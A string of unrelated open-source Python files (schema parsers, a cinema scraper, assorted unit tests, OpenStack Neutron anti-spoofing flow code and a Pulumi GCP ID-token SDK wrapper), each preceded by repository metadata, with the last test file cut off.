return MCFParser(webapp)
elif (format == 'rdfa') :
return RDFAParser(webapp)
else :
return 0
class ParseExampleFile :
def __init__ (self, webapp):
self.webapp = webapp
self.initFields()
def initFields(self):
self.currentStr = []
self.terms = []
self.egmeta = {}
self.preMarkupStr = ""
self.microdataStr = ""
self.rdfaStr = ""
self.jsonStr = ""
self.state= ""
def nextPart(self, next):
if (self.state == 'PRE-MARKUP:'):
self.preMarkupStr = "".join(self.currentStr)
elif (self.state == 'MICRODATA:'):
self.microdataStr = "".join(self.currentStr)
elif (self.state == 'RDFA:'):
self.rdfaStr = "".join(self.currentStr)
elif (self.state == 'JSON:'):
self.jsonStr = "".join(self.currentStr)
self.state = next
self.currentStr = []
def process_example_id(self, m):
self.egmeta["id"] = m.group(1)
logging.debug("Storing ID: %s" % self.egmeta["id"] )
return ''
def parse (self, contents):
content = ""
egid = re.compile("""#(\S+)\s+""")
for i in range(len(contents)):
content += contents[i]
lines = re.split('\n|\r', content)
for line in lines:
# Per-example sections begin with e.g.: 'TYPES: #music-2 Person, MusicComposition, Organization'
if ((len(line) > 6) and line[:6] == "TYPES:"):
self.nextPart('TYPES:')
api.Example.AddExample(self.terms, self.preMarkupStr, self.microdataStr, self.rdfaStr, self.jsonStr, self.egmeta)
# logging.info("AddExample called with terms %s " % self.terms)
self.initFields()
typelist = re.split(':', line)
self.terms = []
self.egmeta = {}
# logging.info("TYPE INFO: '%s' " % line );
tdata = egid.sub(self.process_example_id, typelist[1]) # strips IDs, records them in egmeta["id"]
ttl = tdata.split(',')
for ttli in ttl:
ttli = re.sub(' ', '', ttli)
# logging.info("TTLI: %s " % ttli); # danbri tmp
self.terms.append(api.Unit.GetUnit(ttli, True))
else:
tokens = ["PRE-MARKUP:", "MICRODATA:", "RDFA:", "JSON:"]
for tk in tokens:
ltk = len(tk)
if (len(line) > ltk-1 and line[:ltk] == tk):
self.nextPart(tk)
line = line[ltk:]
if (len(line) > 0):
self.currentStr.append(line + "\n")
api.Example.AddExample(self.terms, self.preMarkupStr, self.microdataStr, self.rdfaStr, self.jsonStr, self.egmeta) # should flush on each block of examples
# logging.info("Final AddExample called with terms %s " % self.terms)
class RDFAParser :
def __init__ (self, webapp):
self.webapp = webapp
def parse (self, files, layer="core"):
self.items = {}
root = []
for i in range(len(files)):
logging.info("RDFa parse schemas in %s " % files[i])
parser = ET.XMLParser(encoding="utf-8")
tree = ET.parse(files[i], parser=parser)
root.append(tree.getroot())
pre = root[i].findall(".//*[@prefix]")
for e in range(len(pre)):
api.Unit.storePrefix(pre[e].get('prefix'))
for i in range(len(root)):
self.extractTriples(root[i], None, layer)
return self.items.keys()
def stripID (self, str) :
if (len(str) > 16 and (str[:17] == 'http://schema.org')) :
return str[18:]
else:
return str
def extractTriples(self, elem, currentNode, layer="core"):
typeof = elem.get('typeof')
resource = elem.get('resource')
href = elem.get('href')
property = elem.get('property')
text = elem.text
if (property != None):
property = api.Unit.GetUnit(self.stripID(property), True)
if (href != None) :
href = api.Unit.GetUnit(self.stripID(href), True)
# self.webapp.write("<br>%s %s %s" % (currentNode, property, href))
api.Triple.AddTriple(currentNode, property, href, layer)
self.items[currentNode] = 1
elif (text != None):
# logging.info("<br>%s %s '%s'" % (currentNode, property, text))
api.Triple.AddTripleText(currentNode, property, text, layer)
self.items[currentNode] = 1
if (resource != None):
currentNode = api.Unit.GetUnit(self.stripID(resource), True)
if (typeof != None):
api.Triple.AddTriple(currentNode, api.Unit.GetUnit("typeOf", True), api.Unit.GetUnit(self.stripID(typeof), True), layer)
for child in elem.findall('*'):
self.extractTriples(child, currentNode, layer)
class MCFParser:
def __init__ (self, webapp):
self.webapp = webapp
def extractUnitName (self, line):
parts = re.split(':', line)
name = parts[1]
return re.sub(' ', '', name)
def extractPredicateName (self, line):
parts = re.split(':', line)
return parts[0]
def cleanValue (self, value) :
if (value.find('"') > -1):
parts = re.split('"', value)
return parts[1]
else:
return re.sub(' ', '', value)
def extractValues (self, line):
parts = re.split(':', line)
raw_values = re.split(',', parts[1])
values = []
for rv in raw_values:
values.append(self.cleanValue(rv))
return values
def parse (self, content):
self.items = {}
lines = re.split('\n|\r', content)
unit = None
for l in lines:
# self.webapp.write("Got line" + l)
if (len(l) > 5 and (l[:5] == "Unit:")) :
unit = api.Unit.GetUnit(self.extractUnitName(l), True)
self.items[unit] = 1
# self.webapp.write("Got unit:" + unit)
elif (len(l) > 1 and (l.find(':') > 1)) :
                predicate = api.Unit.GetUnit(self.extractPredicateName(l), True)
values = self.extractValues(l)
# self.webapp.write("<br>Got predicate " + predicate)
for v in values:
api.Triple.AddTriple(unit, predicate, api.Unit.GetUnit(v, True))
return self.items.keys()
816 | py | Python | scrapyproject/cinemaspiders/yahoo_cinema.py | gas1121/JapanCinemaStatusSpider | ["MIT"]
# -*- coding: utf-8 -*-
from scrapyproject.cinemaspiders.cinema_spider import CinemaSpider
class YahooCinemaSpider(CinemaSpider):
"""
cinema info spider for http://movies.yahoo.co.jp
"""
name = "yahoo_cinema"
allowed_domains = ["movies.yahoo.co.jp"]
start_urls = ['http://movies.yahoo.co.jp/area/']
# settings for cinema_spider
county_xpath = '//div[@id="allarea"]//a'
cinema_xpath = '//div[@id="theater"]//a'
cinema_site_xpath = '//th[text()="公式サイト"]/..//a/text()'
screen_text_xpath = '//th[text()="座席"]/..//li/text()'
screen_pattern = r"^\[?(.*?)(\] )?客席数 (.+)$"
screen_name_pattern = r"\1"
seat_number_pattern = r"\3"
def adjust_cinema_url(self, url):
"""
adjust cinema page's url if needed
"""
return url + "/info/"
834 | py | Python | tests/test_network.py | horpto/phone-iso3166 | ["MIT"]
from phone_iso3166.network import network, country_networks
from phone_iso3166.errors import InvalidNetwork, InvalidCountry
import pytest
def test_network():
c, n = network(238, 1)
assert c == 'DK'
assert n == 'TDC A/S'
c, n = network(238, 2)
assert c == 'DK'
assert n == 'Telenor Denmark'
c, n = network(425, 6)
assert c == 'PS'
assert n == 'Wataniya Palestine Mobile Telecommunications Company'
def test_country_networks():
nets = country_networks('US')
for n in nets:
mcc, mnc, name0 = n
c, name1 = network(mcc, mnc)
assert c == 'US'
assert name0 == name1
def test_invalid_country():
with pytest.raises(InvalidCountry):
country_networks('XX')
def test_invalid_network():
with pytest.raises(InvalidNetwork):
network(0, 0)
512 | py | Python | pysal/explore/segregation/tests/test_atkinson.py | ocefpaf/pysal | ["BSD-3-Clause"]
import unittest
import pysal.lib
import geopandas as gpd
import numpy as np
from pysal.explore.segregation.aspatial import Atkinson
class Atkinson_Tester(unittest.TestCase):
def test_Atkinson(self):
s_map = gpd.read_file(pysal.lib.examples.get_path("sacramentot2.shp"))
df = s_map[['geometry', 'HISP_', 'TOT_POP']]
index = Atkinson(df, 'HISP_', 'TOT_POP')
np.testing.assert_almost_equal(index.statistic, 0.15079259382667654)
if __name__ == '__main__':
unittest.main()
2,234 | py | Python | tests/python/gaia-ui-tests/gaiatest/tests/functional/gallery/test_gallery_switch_to_camera.py | marshall/gaia | ["Apache-2.0"]
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
try:
from marionette import Wait
except:
from marionette_driver import Wait
from gaiatest import GaiaTestCase
from gaiatest.apps.gallery.app import Gallery
from gaiatest.apps.camera.app import ImagePreview
class TestGallery(GaiaTestCase):
def setUp(self):
GaiaTestCase.setUp(self)
self.apps.set_permission('Camera', 'geolocation', 'deny')
self.push_resource('IMG_0001.jpg')
def test_gallery_switch_to_camera(self):
"""
https://moztrap.mozilla.org/manage/case/3620/
"""
gallery = Gallery(self.marionette)
gallery.launch()
gallery.wait_for_files_to_load(1)
# Enter the single photo view
image = gallery.tap_first_gallery_item()
self.assertIsNotNone(image.current_image_source)
# Check that there are 5 options displayed beneath the picture
self.assertEqual(len(image.photo_toolbar_options), 5)
# Tap on the Camera button to go to the Camera app
self.previous_number_of_pictures = len(self.data_layer.picture_files)
self.camera = image.tap_switch_to_camera()
# Take a picture and verify the picture is taken
self.camera.take_photo()
# Check that picture saved to SD card
Wait(self.marionette).until(lambda m: len(self.data_layer.picture_files) ==
self.previous_number_of_pictures + 1)
# Open Preview, tap the option icon and select Gallery app
self.camera.tap_thumbnail()
self.preview = ImagePreview(self.marionette)
self.preview.tap_switch_to_gallery()
# Verify the Gallery app is now open, with one more file
gallery.wait_for_files_to_load(2)
new_image = gallery.tap_first_gallery_item()
# verify the new first image is not same as the previous (and only) first image,
# meaning that the new image is shown on the top of the gallery app grid
self.assertFalse(new_image.current_image_source is image.current_image_source)
14,468 | py | Python | neutron/plugins/ml2/drivers/openvswitch/agent/openflow/native/br_int.py | 1pintbeer/neutron | ["Apache-2.0"]
# Copyright (C) 2014,2015 VA Linux Systems Japan K.K.
# Copyright (C) 2014,2015 YAMAMOTO Takashi <yamamoto at valinux co jp>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
* references
** OVS agent https://wiki.openstack.org/wiki/Ovs-flow-logic
"""
import netaddr
from neutron_lib import constants as p_const
from os_ken.lib.packet import ether_types
from os_ken.lib.packet import icmpv6
from os_ken.lib.packet import in_proto
from oslo_log import log as logging
from neutron.plugins.ml2.drivers.openvswitch.agent.common import constants
from neutron.plugins.ml2.drivers.openvswitch.agent.openflow.native \
import ovs_bridge
LOG = logging.getLogger(__name__)
class OVSIntegrationBridge(ovs_bridge.OVSAgentBridge):
"""openvswitch agent br-int specific logic."""
of_tables = constants.INT_BR_ALL_TABLES
def setup_default_table(self):
self.setup_canary_table()
self.install_goto(dest_table_id=constants.TRANSIENT_TABLE)
self.install_normal(table_id=constants.TRANSIENT_TABLE, priority=3)
self.install_drop(table_id=constants.ARP_SPOOF_TABLE)
self.install_drop(table_id=constants.LOCAL_SWITCHING,
priority=constants.OPENFLOW_MAX_PRIORITY,
vlan_vid=constants.DEAD_VLAN_TAG)
def setup_canary_table(self):
self.install_drop(constants.CANARY_TABLE)
def check_canary_table(self):
try:
flows = self.dump_flows(constants.CANARY_TABLE)
except RuntimeError:
LOG.exception("Failed to communicate with the switch")
return constants.OVS_DEAD
return constants.OVS_NORMAL if flows else constants.OVS_RESTARTED
@staticmethod
def _local_vlan_match(_ofp, ofpp, port, vlan_vid):
return ofpp.OFPMatch(in_port=port, vlan_vid=vlan_vid)
def provision_local_vlan(self, port, lvid, segmentation_id):
(_dp, ofp, ofpp) = self._get_dp()
if segmentation_id is None:
vlan_vid = ofp.OFPVID_NONE
actions = [ofpp.OFPActionPushVlan()]
else:
vlan_vid = segmentation_id | ofp.OFPVID_PRESENT
actions = []
match = self._local_vlan_match(ofp, ofpp, port, vlan_vid)
actions += [
ofpp.OFPActionSetField(vlan_vid=lvid | ofp.OFPVID_PRESENT),
]
instructions = [
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions),
ofpp.OFPInstructionGotoTable(table_id=constants.TRANSIENT_TABLE),
]
self.install_instructions(
instructions=instructions,
priority=3,
match=match,
)
def reclaim_local_vlan(self, port, segmentation_id):
(_dp, ofp, ofpp) = self._get_dp()
if segmentation_id is None:
vlan_vid = ofp.OFPVID_NONE
else:
vlan_vid = segmentation_id | ofp.OFPVID_PRESENT
match = self._local_vlan_match(ofp, ofpp, port, vlan_vid)
self.uninstall_flows(match=match)
@staticmethod
def _arp_dvr_dst_mac_match(ofp, ofpp, vlan, dvr_mac):
# If eth_dst is equal to the dvr mac of this host, then
# flag it as matched.
return ofpp.OFPMatch(vlan_vid=vlan | ofp.OFPVID_PRESENT,
eth_dst=dvr_mac)
@staticmethod
def _dvr_dst_mac_table_id(network_type):
if network_type == p_const.TYPE_VLAN:
return constants.ARP_DVR_MAC_TO_DST_MAC_VLAN
else:
return constants.ARP_DVR_MAC_TO_DST_MAC
def install_dvr_dst_mac_for_arp(self, network_type,
vlan_tag, gateway_mac, dvr_mac, rtr_port):
table_id = self._dvr_dst_mac_table_id(network_type)
# Match the destination MAC with the DVR MAC
(_dp, ofp, ofpp) = self._get_dp()
match = self._arp_dvr_dst_mac_match(ofp, ofpp, vlan_tag, dvr_mac)
# Incoming packet will come with destination MAC of DVR host MAC from
# the ARP Responder. The Source MAC in this case will have the source
# MAC of the port MAC that responded from the ARP responder.
# So just remove the DVR host MAC from the 'eth_dst' and replace it
# with the gateway-mac. The packet should end up in the right the table
# for the packet to reach the router interface.
actions = [
ofpp.OFPActionSetField(eth_dst=gateway_mac),
ofpp.OFPActionPopVlan(),
ofpp.OFPActionOutput(rtr_port, 0)
]
self.install_apply_actions(table_id=table_id,
priority=5,
match=match,
actions=actions)
@staticmethod
def _dvr_to_src_mac_match(ofp, ofpp, vlan_tag, dst_mac):
return ofpp.OFPMatch(vlan_vid=vlan_tag | ofp.OFPVID_PRESENT,
eth_dst=dst_mac)
@staticmethod
def _dvr_to_src_mac_table_id(network_type):
if network_type == p_const.TYPE_VLAN:
return constants.DVR_TO_SRC_MAC_VLAN
else:
return constants.DVR_TO_SRC_MAC
def install_dvr_to_src_mac(self, network_type,
vlan_tag, gateway_mac, dst_mac, dst_port):
table_id = self._dvr_to_src_mac_table_id(network_type)
(_dp, ofp, ofpp) = self._get_dp()
match = self._dvr_to_src_mac_match(ofp, ofpp,
vlan_tag=vlan_tag, dst_mac=dst_mac)
actions = [
ofpp.OFPActionSetField(eth_src=gateway_mac),
]
instructions = [
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions),
ofpp.OFPInstructionGotoTable(table_id=constants.TRANSIENT_TABLE),
]
self.install_instructions(table_id=table_id,
priority=4,
match=match,
instructions=instructions)
actions = [
ofpp.OFPActionPopVlan(),
ofpp.OFPActionOutput(dst_port, 0),
]
self.install_apply_actions(table_id=constants.TRANSIENT_TABLE,
priority=4,
match=match,
actions=actions)
def delete_dvr_to_src_mac(self, network_type, vlan_tag, dst_mac):
table_id = self._dvr_to_src_mac_table_id(network_type)
(_dp, ofp, ofpp) = self._get_dp()
match = self._dvr_to_src_mac_match(ofp, ofpp,
vlan_tag=vlan_tag, dst_mac=dst_mac)
for table in (table_id, constants.TRANSIENT_TABLE):
self.uninstall_flows(
strict=True, priority=4, table_id=table, match=match)
def add_dvr_mac_vlan(self, mac, port):
self.install_goto(table_id=constants.LOCAL_SWITCHING,
priority=4,
in_port=port,
eth_src=mac,
dest_table_id=constants.DVR_TO_SRC_MAC_VLAN)
def remove_dvr_mac_vlan(self, mac):
# REVISIT(yamamoto): match in_port as well?
self.uninstall_flows(table_id=constants.LOCAL_SWITCHING,
eth_src=mac)
def add_dvr_mac_tun(self, mac, port):
self.install_goto(table_id=constants.LOCAL_SWITCHING,
priority=2,
in_port=port,
eth_src=mac,
dest_table_id=constants.DVR_TO_SRC_MAC)
def remove_dvr_mac_tun(self, mac, port):
self.uninstall_flows(table_id=constants.LOCAL_SWITCHING,
in_port=port, eth_src=mac)
def delete_dvr_dst_mac_for_arp(self, network_type,
vlan_tag, gateway_mac, dvr_mac, rtr_port):
table_id = self._dvr_to_src_mac_table_id(network_type)
(_dp, ofp, ofpp) = self._get_dp()
match = self._arp_dvr_dst_mac_match(ofp, ofpp, vlan_tag, dvr_mac)
self.uninstall_flows(
strict=True, priority=5, table_id=table_id, match=match)
def add_dvr_gateway_mac_arp_vlan(self, mac, port):
self.install_goto(table_id=constants.LOCAL_SWITCHING,
priority=5,
in_port=port,
eth_dst=mac,
dest_table_id=constants.ARP_DVR_MAC_TO_DST_MAC_VLAN)
def remove_dvr_gateway_mac_arp_vlan(self, mac, port):
self.uninstall_flows(table_id=constants.LOCAL_SWITCHING,
eth_dst=mac)
def add_dvr_gateway_mac_arp_tun(self, mac, port):
self.install_goto(table_id=constants.LOCAL_SWITCHING,
priority=5,
in_port=port,
eth_dst=mac,
dest_table_id=constants.ARP_DVR_MAC_TO_DST_MAC)
def remove_dvr_gateway_mac_arp_tun(self, mac, port):
self.uninstall_flows(table_id=constants.LOCAL_SWITCHING,
eth_dst=mac)
@staticmethod
def _arp_reply_match(ofp, ofpp, port):
return ofpp.OFPMatch(in_port=port,
eth_type=ether_types.ETH_TYPE_ARP)
@staticmethod
def _icmpv6_reply_match(ofp, ofpp, port):
return ofpp.OFPMatch(in_port=port,
eth_type=ether_types.ETH_TYPE_IPV6,
ip_proto=in_proto.IPPROTO_ICMPV6,
icmpv6_type=icmpv6.ND_NEIGHBOR_ADVERT)
def install_icmpv6_na_spoofing_protection(self, port, ip_addresses):
# Allow neighbor advertisements as long as they match addresses
# that actually belong to the port.
for ip in ip_addresses:
masked_ip = self._cidr_to_os_ken(ip)
self.install_goto(
table_id=constants.ARP_SPOOF_TABLE, priority=2,
eth_type=ether_types.ETH_TYPE_IPV6,
ip_proto=in_proto.IPPROTO_ICMPV6,
icmpv6_type=icmpv6.ND_NEIGHBOR_ADVERT,
ipv6_nd_target=masked_ip, in_port=port,
dest_table_id=constants.TRANSIENT_TABLE)
# Now that the rules are ready, direct icmpv6 neighbor advertisement
# traffic from the port into the anti-spoof table.
(_dp, ofp, ofpp) = self._get_dp()
match = self._icmpv6_reply_match(ofp, ofpp, port=port)
self.install_goto(table_id=constants.LOCAL_SWITCHING,
priority=10,
match=match,
dest_table_id=constants.ARP_SPOOF_TABLE)
def set_allowed_macs_for_port(self, port, mac_addresses=None,
allow_all=False):
if allow_all:
self.uninstall_flows(table_id=constants.LOCAL_SWITCHING,
in_port=port)
self.uninstall_flows(table_id=constants.MAC_SPOOF_TABLE,
in_port=port)
return
mac_addresses = mac_addresses or []
for address in mac_addresses:
self.install_goto(
table_id=constants.MAC_SPOOF_TABLE, priority=2,
eth_src=address, in_port=port,
dest_table_id=constants.TRANSIENT_TABLE)
# normalize so we can see if macs are the same
mac_addresses = {netaddr.EUI(mac) for mac in mac_addresses}
flows = self.dump_flows(constants.MAC_SPOOF_TABLE)
for flow in flows:
matches = dict(flow.match.items())
if matches.get('in_port') != port:
continue
if not matches.get('eth_src'):
continue
flow_mac = matches['eth_src']
if netaddr.EUI(flow_mac) not in mac_addresses:
self.uninstall_flows(table_id=constants.MAC_SPOOF_TABLE,
in_port=port, eth_src=flow_mac)
self.install_goto(table_id=constants.LOCAL_SWITCHING,
priority=9, in_port=port,
dest_table_id=constants.MAC_SPOOF_TABLE)
def install_arp_spoofing_protection(self, port, ip_addresses):
# allow ARP replies as long as they match addresses that actually
# belong to the port.
for ip in ip_addresses:
masked_ip = self._cidr_to_os_ken(ip)
self.install_goto(table_id=constants.ARP_SPOOF_TABLE,
priority=2,
eth_type=ether_types.ETH_TYPE_ARP,
arp_spa=masked_ip,
in_port=port,
dest_table_id=constants.MAC_SPOOF_TABLE)
# Now that the rules are ready, direct ARP traffic from the port into
# the anti-spoof table.
# This strategy fails gracefully because OVS versions that can't match
# on ARP headers will just process traffic normally.
(_dp, ofp, ofpp) = self._get_dp()
match = self._arp_reply_match(ofp, ofpp, port=port)
self.install_goto(table_id=constants.LOCAL_SWITCHING,
priority=10,
match=match,
dest_table_id=constants.ARP_SPOOF_TABLE)
def delete_arp_spoofing_protection(self, port):
(_dp, ofp, ofpp) = self._get_dp()
match = self._arp_reply_match(ofp, ofpp, port=port)
self.uninstall_flows(table_id=constants.LOCAL_SWITCHING,
match=match)
match = self._icmpv6_reply_match(ofp, ofpp, port=port)
self.uninstall_flows(table_id=constants.LOCAL_SWITCHING,
match=match)
self.delete_arp_spoofing_allow_rules(port)
def delete_arp_spoofing_allow_rules(self, port):
self.uninstall_flows(table_id=constants.ARP_SPOOF_TABLE,
in_port=port)
1,455 | py | Python | src/programy/processors/pre/toupper.py | motazsaad/fit-bot-fb-clt | ["MIT"]
"""
Copyright (c) 2016-2019 Keith Sterling http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from programy.utils.logging.ylogger import YLogger
from programy.processors.processing import PreProcessor
class ToUpperPreProcessor(PreProcessor):
def __init__(self):
PreProcessor.__init__(self)
def process(self, context, word_string):
YLogger.debug(context, "Making input upper case...")
return word_string.upper()
7,997 | py | Python | sdk/python/pulumi_gcp/serviceaccount/get_account_id_token.py | sisisin/pulumi-gcp | ["ECL-2.0", "Apache-2.0"]
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'GetAccountIdTokenResult',
'AwaitableGetAccountIdTokenResult',
'get_account_id_token',
'get_account_id_token_output',
]
@pulumi.output_type
class GetAccountIdTokenResult:
"""
A collection of values returned by getAccountIdToken.
"""
def __init__(__self__, delegates=None, id=None, id_token=None, include_email=None, target_audience=None, target_service_account=None):
if delegates and not isinstance(delegates, list):
raise TypeError("Expected argument 'delegates' to be a list")
pulumi.set(__self__, "delegates", delegates)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if id_token and not isinstance(id_token, str):
raise TypeError("Expected argument 'id_token' to be a str")
pulumi.set(__self__, "id_token", id_token)
if include_email and not isinstance(include_email, bool):
raise TypeError("Expected argument 'include_email' to be a bool")
pulumi.set(__self__, "include_email", include_email)
if target_audience and not isinstance(target_audience, str):
raise TypeError("Expected argument 'target_audience' to be a str")
pulumi.set(__self__, "target_audience", target_audience)
if target_service_account and not isinstance(target_service_account, str):
raise TypeError("Expected argument 'target_service_account' to be a str")
pulumi.set(__self__, "target_service_account", target_service_account)
@property
@pulumi.getter
def delegates(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "delegates")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="idToken")
def id_token(self) -> str:
"""
The `id_token` representing the new generated identity.
"""
return pulumi.get(self, "id_token")
@property
@pulumi.getter(name="includeEmail")
def include_email(self) -> Optional[bool]:
return pulumi.get(self, "include_email")
@property
@pulumi.getter(name="targetAudience")
def target_audience(self) -> str:
return pulumi.get(self, "target_audience")
@property
@pulumi.getter(name="targetServiceAccount")
def target_service_account(self) -> Optional[str]:
return pulumi.get(self, "target_service_account")
class AwaitableGetAccountIdTokenResult(GetAccountIdTokenResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetAccountIdTokenResult(
delegates=self.delegates,
id=self.id,
id_token=self.id_token,
include_email=self.include_email,
target_audience=self.target_audience,
target_service_account=self.target_service_account)
def get_account_id_token(delegates: Optional[Sequence[str]] = None,
include_email: Optional[bool] = None,
target_audience: Optional[str] = None,
target_service_account: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetAccountIdTokenResult:
"""
This data source provides a Google OpenID Connect (`oidc`) `id_token`. Tokens issued from this data source are typically used to call external services that accept OIDC tokens for authentication (e.g. [Google Cloud Run](https://cloud.google.com/run/docs/authenticating/service-to-service)).
For more information see
[OpenID Connect](https://openid.net/specs/openid-connect-core-1_0.html#IDToken).
## Example Usage
### ServiceAccount JSON Credential File.
`service_account.get_account_id_token` will use the configured provider credentials
### Service Account Impersonation.
`service_account.get_account_access_token` will use background impersonated credentials provided by `service_account.get_account_access_token`.
Note: to use the following, you must grant `target_service_account` the
`roles/iam.serviceAccountTokenCreator` role on itself.
:param Sequence[str] delegates: Delegate chain of approvals needed to perform full impersonation. Specify the fully qualified service account name. Used only when using impersonation mode.
:param bool include_email: Include the verified email in the claim. Used only when using impersonation mode.
:param str target_audience: The audience claim for the `id_token`.
:param str target_service_account: The email of the service account being impersonated. Used only when using impersonation mode.
"""
__args__ = dict()
__args__['delegates'] = delegates
__args__['includeEmail'] = include_email
__args__['targetAudience'] = target_audience
__args__['targetServiceAccount'] = target_service_account
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('gcp:serviceAccount/getAccountIdToken:getAccountIdToken', __args__, opts=opts, typ=GetAccountIdTokenResult).value
return AwaitableGetAccountIdTokenResult(
delegates=__ret__.delegates,
id=__ret__.id,
id_token=__ret__.id_token,
include_email=__ret__.include_email,
target_audience=__ret__.target_audience,
target_service_account=__ret__.target_service_account)
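# Illustrative usage sketch added by the editor (not part of the generated SDK code).
# The audience URL is a placeholder; in a real Pulumi program the data source is
# typically used to obtain an OIDC token for calling a Cloud Run service:
#
#     import pulumi
#     import pulumi_gcp as gcp
#
#     token = gcp.serviceaccount.get_account_id_token(
#         target_audience="https://my-cloud-run-service-abc123-uc.a.run.app")
#     pulumi.export("id_token", pulumi.Output.secret(token.id_token))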
@_utilities.lift_output_func(get_account_id_token)
def get_account_id_token_output(delegates: Optional[pulumi.Input[Optional[Sequence[str]]]] = None,
include_email: Optional[pulumi.Input[Optional[bool]]] = None,
target_audience: Optional[pulumi.Input[str]] = None,
target_service_account: Optional[pulumi.Input[Optional[str]]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetAccountIdTokenResult]:
"""
This data source provides a Google OpenID Connect (`oidc`) `id_token`. Tokens issued from this data source are typically used to call external services that accept OIDC tokens for authentication (e.g. [Google Cloud Run](https://cloud.google.com/run/docs/authenticating/service-to-service)).
For more information see
[OpenID Connect](https://openid.net/specs/openid-connect-core-1_0.html#IDToken).
## Example Usage
### ServiceAccount JSON Credential File.
`service_account.get_account_id_token` will use the configured provider credentials
### Service Account Impersonation.
`service_account.get_account_access_token` will use background impersonated credentials provided by `service_account.get_account_access_token`.
Note: to use the following, you must grant `target_service_account` the
`roles/iam.serviceAccountTokenCreator` role on itself.
:param Sequence[str] delegates: Delegate chain of approvals needed to perform full impersonation. Specify the fully qualified service account name. Used only when using impersonation mode.
:param bool include_email: Include the verified email in the claim. Used only when using impersonation mode.
:param str target_audience: The audience claim for the `id_token`.
:param str target_service_account: The email of the service account being impersonated. Used only when using impersonation mode.
"""
...
1,147 | py | Python | mojo/public/tools/bindings/pylib/mojom_tests/generate/module_unittest.py | kjthegod/chromium | ["BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause"]
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import imp
import os.path
import sys
import unittest
def _GetDirAbove(dirname):
"""Returns the directory "above" this file containing |dirname| (which must
also be "above" this file)."""
path = os.path.abspath(__file__)
while True:
path, tail = os.path.split(path)
assert tail
if tail == dirname:
return path
try:
imp.find_module("mojom")
except ImportError:
sys.path.append(os.path.join(_GetDirAbove("pylib"), "pylib"))
from mojom.generate import module as mojom
class ModuleTest(unittest.TestCase):
def testNonInterfaceAsInterfaceRequest(self):
"""Tests that a non-interface cannot be used for interface requests."""
module = mojom.Module('test_module', 'test_namespace')
struct = mojom.Struct('TestStruct', module=module)
with self.assertRaises(Exception) as e:
mojom.InterfaceRequest(struct)
self.assertEquals(
e.exception.__str__(),
'Interface request requires \'x:TestStruct\' to be an interface.')
| 30.184211 | 77 | 0.721011 |
d98224a343ca9d1555a85ac8d9620d433b8245cd | 3,132 | py | Python | weedcoco/tests/index/test_indexing.py | Sydney-Informatics-Hub/Weed-ID-Interchange | d27891c2148de54d03727f688f8b6c6c414ec09b | [
"MIT"
] | 14 | 2021-11-29T12:16:59.000Z | 2022-03-20T00:26:10.000Z | weedcoco/tests/index/test_indexing.py | Sydney-Informatics-Hub/Weed-ID-Interchange | d27891c2148de54d03727f688f8b6c6c414ec09b | [
"MIT"
] | 282 | 2020-07-10T00:52:21.000Z | 2021-03-01T06:58:05.000Z | weedcoco/tests/index/test_indexing.py | Sydney-Informatics-Hub/Weed-ID-Interchange | d27891c2148de54d03727f688f8b6c6c414ec09b | [
"MIT"
] | 2 | 2020-10-07T06:12:39.000Z | 2021-02-02T05:21:32.000Z | import pathlib
import pytest
from elasticmock import elasticmock as elasticmock
from weedcoco.index.indexing import main, ElasticSearchIndexer
BASIC_INPUT_PATH = str(
pathlib.Path(__file__).parent.parent
/ "repo"
/ "deposit_data"
/ "basic_1"
/ "weedcoco.json"
)
THUMBNAIL_DIR = "arbitrary-thumbnail-dir"
@elasticmock
def test_smoke_indexing():
# run indexing but check nothing
main(
[
"--weedcoco-path",
BASIC_INPUT_PATH,
"--thumbnail-dir",
THUMBNAIL_DIR,
"--upload-id",
"12345",
]
)
def test_batch_generation():
# TODO
pytest.xfail("Not yet implemented")
def test_task_type():
indexer = ElasticSearchIndexer(
